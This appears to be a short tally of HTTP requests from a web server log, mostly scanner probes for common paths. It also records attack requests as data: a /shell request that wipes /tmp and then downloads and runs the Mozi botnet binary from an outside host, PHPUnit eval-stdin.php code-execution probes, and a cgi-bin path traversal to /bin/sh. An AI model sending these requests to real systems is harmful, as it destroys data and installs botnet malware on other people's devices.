1	GET	`/nmaplowercheck1655188387`	HTTP/1.1
2	GET	`/robots.txt`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+http[:]//58[.]253[.]13[.]235:51279/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/wordpress/`	HTTP/1.1
1	GET	`/wp/`	HTTP/1.1
1	GET	`/xmlrpc.php?rsd`	HTTP/1.1
3	HEAD	`/`	HTTP/1.1
1	HEAD	`/robots.txt`	HTTP/1.0
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
4	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
4	PRI	`*`	HTTP/2.0